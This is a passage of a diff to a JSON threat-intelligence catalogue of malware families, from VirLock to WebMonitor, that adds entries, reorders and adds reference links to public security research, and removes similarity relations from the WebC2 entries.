+ "https://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/",
+ "https://blogs.blackberry.com/en/2019/07/threat-spotlight-virlock-polymorphic-ransomware",
+ "https://www.virusbulletin.com/virusbulletin/2016/12/vb2015-paper-its-file-infector-its-ransomware-its-virlock/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "86ea83f1-c06c-4ee3-9c4e-df302974f649",
+ "value": "VirLock"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate",
+ "https://norfolkinfosec.com/some-notes-on-virtualgate/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "48d47a27-464a-4087-b691-574c3b494efb",
+ "value": "VIRTUALGATE"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.virut",
- "https://chrisdietri.ch/post/virut-resurrects/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
- "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
- "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
- "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
"https://www.secureworks.com/research/virut-encryption-analysis",
+ "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://chrisdietri.ch/post/virut-resurrects/",
+ "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/",
+ "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/",
+ "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/",
"https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet"
],
"synonyms": [],
@@ -47079,15 +49744,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm",
- "https://community.riskiq.com/article/24759ad2",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
"https://twitter.com/tccontre18/status/1461386178528264204",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
"https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
+ "https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1",
+ "https://community.riskiq.com/article/24759ad2",
+ "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics",
"https://bazaar.abuse.ch/browse/signature/Vjw0rm/",
- "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf"
+ "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf"
],
"synonyms": [],
"type": []
@@ -47100,8 +49767,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus",
- "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
- "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/"
+ "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/",
+ "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/"
],
"synonyms": [
"VMzeus",
@@ -47114,12 +49781,12 @@
"value": "VM Zeus"
},
{
- "description": "",
+ "description": "Malware of this family searches for computers on a network and creates copies of itself in folders with open access. For the program to be activated, the user must first run it on the computer. The code of this malware is written in the Visual Basic programming language and uses obfuscation, which is a distinguishing feature of this family. Code obfuscation complicates attempts by anti-virus software to analyze suspected malware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions",
"https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions",
"http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html"
],
"synonyms": [
@@ -47130,6 +49797,20 @@
"uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840",
"value": "Vobfus"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants",
+ "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f2c91bfb-1b22-4399-849a-f07304c2e81f",
+ "value": "Vohuk"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -47151,16 +49832,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer",
+ "https://securelist.com/lazarus-threatneedle/100803/",
+ "https://www.us-cert.gov/ncas/alerts/TA17-318B",
+ "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/",
+ "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
+ "https://securelist.com/operation-applejeus/87553/",
"https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view",
"https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://securelist.com/lazarus-threatneedle/100803/",
"https://www.secureworks.com/research/threat-profiles/nickel-academy",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.us-cert.gov/ncas/alerts/TA17-318B",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://securelist.com/operation-applejeus/87553/",
- "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view",
- "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf",
"https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74"
],
"synonyms": [
@@ -47169,15 +49851,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "0a52e73b-d7e9-45ae-9bda-46568f753931",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
"value": "Volgmer"
},
@@ -47186,8 +49859,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex",
- "https://twitter.com/malwrhunterteam/status/1351808079164276736",
- "https://twitter.com/VK_Intel/status/1355196321964109824"
+ "https://twitter.com/VK_Intel/status/1355196321964109824",
+ "https://twitter.com/malwrhunterteam/status/1351808079164276736"
],
"synonyms": [],
"type": []
@@ -47213,6 +49886,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle",
+ "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://blogs.jpcert.or.jp/en/2022/07/vsingle.html",
"https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html"
],
@@ -47227,9 +49901,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer",
+ "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis",
"http://www.xylibox.com/2013/01/vskimmer.html",
- "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/",
- "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis"
+ "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/"
],
"synonyms": [],
"type": []
@@ -47294,42 +49968,43 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
- "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
- "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
"https://www.youtube.com/watch?v=Q90uZS3taG0",
- "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
- "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
- "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
- "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
- "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
- "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
"https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d",
- "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf",
- "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
- "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
- "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html",
+ "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/",
"https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
+ "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/",
+ "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
"https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
+ "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
+ "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
"https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
- "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf"
+ "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html",
+ "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
+ "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
+ "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
+ "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
+ "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
+ "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/",
+ "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf"
],
"synonyms": [
"Wana Decrypt0r",
@@ -47387,53 +50062,53 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker",
- "https://ioc.hatenablog.com/entry/2020/08/16/132853",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
- "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/",
- "https://unit42.paloaltonetworks.com/wastedlocker/",
- "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
"https://securelist.com/wastedlocker-technical-analysis/97944/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
"https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter",
+ "https://www.bbc.com/news/world-us-canada-53195749",
"https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
- "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
- "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
+ "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf",
+ "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://ioc.hatenablog.com/entry/2020/08/16/132853",
+ "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
+ "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf",
+ "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf",
+ "https://unit42.paloaltonetworks.com/wastedlocker/",
+ "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/",
"http://www.secureworks.com/research/threat-profiles/gold-drake",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
"https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.bbc.com/news/world-us-canada-53195749",
- "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
- "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/",
+ "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
],
"synonyms": [],
"type": []
@@ -47447,12 +50122,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear",
"https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
"https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
"https://daydaynews.cc/zh-tw/technology/297265.html",
- "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html"
+ "https://www.youtube.com/watch?v=6SDdUVejR2w",
+ "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf"
],
"synonyms": [
"DbgPrint",
@@ -47499,15 +50174,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2d8043b4-48ef-4992-a04a-c342cbbb4f87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c",
"value": "WebC2-AdSpace"
},
@@ -47521,15 +50187,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2a27431-28ea-42e3-a0cc-72f29828c292",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
"value": "WebC2-Ausov"
},
@@ -47543,15 +50200,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a601e1b0-c0bc-4665-9639-4dc5e588520c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f",
"value": "WebC2-Bolid"
},
@@ -47565,15 +50213,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "950a8038-eeec-44a0-b3db-a557e5796416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
"value": "WebC2-Cson"
},
@@ -47587,15 +50226,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "54be66ea-fd26-4f25-b4af-d10d16fa919f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "acdda3e5-e776-419b-b060-14f3406de061",
"value": "WebC2-DIV"
},
@@ -47609,15 +50239,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "bfe69071-17bf-466f-97fd-669b72053137",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "cfed10ed-6601-469e-a1df-2d561b031244",
"value": "WebC2-GreenCat"
},
@@ -47631,15 +50252,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4ef97a7e-5686-44cb-ad91-7a393f32f39b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6",
"value": "WebC2-Head"
},
@@ -47653,15 +50265,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2afc267-9674-4ca3-807f-47678fb40da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
"value": "WebC2-Kt3"
},
@@ -47675,15 +50278,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "84f3bacf-abd5-445e-a98a-5b02f1eaac92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
"value": "WebC2-Qbp"
},
@@ -47697,15 +50291,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9e36feee-e7d2-400a-960e-5f2bd6ac0c15",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c",
"value": "WebC2-Rave"
},
@@ -47719,15 +50304,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "269fee27-f275-44e9-a0db-bebf14d2f83c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae",
"value": "WebC2-Table"
},
@@ -47741,15 +50317,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d155c213-02bd-4992-a410-a541a1c1eb40",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156",
"value": "WebC2-UGX"
},
@@ -47763,15 +50330,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d49f372e-c4ee-47bd-bc98-e3877fabaf9e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
"value": "WebC2-Yahoo"
},
@@ -47780,10 +50338,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor",
